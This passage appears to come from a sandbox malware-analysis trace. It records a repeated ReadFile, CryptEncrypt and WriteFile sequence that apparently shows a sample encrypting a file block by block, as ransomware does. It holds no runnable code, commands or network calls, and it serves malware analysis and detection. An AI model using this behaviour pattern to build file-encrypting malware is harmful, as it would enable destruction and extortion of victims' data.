Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.870] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.870] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.870] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.870] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.871] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.871] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.871] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.871] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.871] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.872] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.872] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.872] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.872] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.872] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.873] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.873] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.873] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.873] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.873] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.874] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.874] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.874] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.874] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.874] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.922] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.922] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.923] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.923] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.923] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.923] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.923] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.924] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.924] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.924] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.924] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.924] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.924] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.925] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.925] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.925] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.925] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.925] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.926] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.926] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, 